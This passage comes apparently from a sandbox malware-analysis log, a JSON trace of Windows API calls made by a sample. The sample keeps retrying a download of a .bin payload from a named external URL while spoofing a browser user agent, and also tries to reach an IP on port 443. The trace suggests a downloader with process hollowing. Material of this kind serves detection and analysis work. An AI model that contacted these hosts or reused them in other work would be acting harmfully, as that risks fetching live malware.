"thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0028" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1186 }, { "timestamp": "2025-02-27 23:35:06,972", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1187 }, { "timestamp": "2025-02-27 23:35:06,972", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1188 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc002c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1189 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1190 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc002c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1191 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1192 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000450", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1104" } ], "repeated": 0, "id": 1193 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1194 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P\\xc0u\\x00" } ], "repeated": 0, "id": 1195 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1196 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaC\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1197 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1198 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1199 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000450" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1200 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1201 }, { "timestamp": "2025-02-27 23:35:08,019", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1202 }, { "timestamp": "2025-02-27 23:35:10,097", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1203 }, { "timestamp": "2025-02-27 23:35:10,097", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" } ], "repeated": 0, "id": 1204 }, { "timestamp": "2025-02-27 23:35:10,097", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1205 }, { "timestamp": "2025-02-27 23:35:10,097", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc002c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1206 }, { "timestamp": "2025-02-27 23:35:10,097", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1207 }, { "timestamp": "2025-02-27 23:35:10,097", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1208 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0030", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1209 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1210 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0030" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1211 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1212 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004b0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1200" } ], "repeated": 0, "id": 1213 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1214 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x80\\xd8s\\x00" } ], "repeated": 0, "id": 1215 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1200" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1216 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaE\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1217 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1200" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1218 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1219 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004b0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1220 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1200" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1221 }, { "timestamp": "2025-02-27 23:35:11,112", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1200" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1222 }, { "timestamp": "2025-02-27 23:35:13,394", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1223 }, { "timestamp": "2025-02-27 23:35:13,394", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1200" } ], "repeated": 0, "id": 1224 }, { "timestamp": "2025-02-27 23:35:13,394", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1225 }, { "timestamp": "2025-02-27 23:35:13,394", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0030" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1226 }, { "timestamp": "2025-02-27 23:35:13,394", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1227 }, { "timestamp": "2025-02-27 23:35:14,409", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1228 }, { "timestamp": "2025-02-27 23:35:14,409", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0034", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1229 }, { "timestamp": "2025-02-27 23:35:14,409", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1230 }, { "timestamp": "2025-02-27 23:35:14,409", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0034" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1231 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1232 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b8" } ], "repeated": 0, "id": 1233 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c0" } ], "repeated": 0, "id": 1234 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1235 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b0" } ], "repeated": 0, "id": 1236 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1237 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 1238 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a8" } ], "repeated": 0, "id": 1239 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1240 }, { "timestamp": "2025-02-27 23:35:14,550", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004a8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1241 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1242 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x80\\xd8s\\x00" } ], "repeated": 0, "id": 1243 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1244 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaF\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1245 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1246 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1247 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1248 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1249 }, { "timestamp": "2025-02-27 23:35:14,566", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1250 }, { "timestamp": "2025-02-27 23:35:16,597", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1251 }, { "timestamp": "2025-02-27 23:35:16,597", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1192" } ], "repeated": 0, "id": 1252 }, { "timestamp": "2025-02-27 23:35:16,597", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1253 }, { "timestamp": "2025-02-27 23:35:16,597", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0034" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1254 }, { "timestamp": "2025-02-27 23:35:16,597", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1255 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1256 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0038", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1257 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1258 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0038" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1259 }, { "timestamp": "2025-02-27 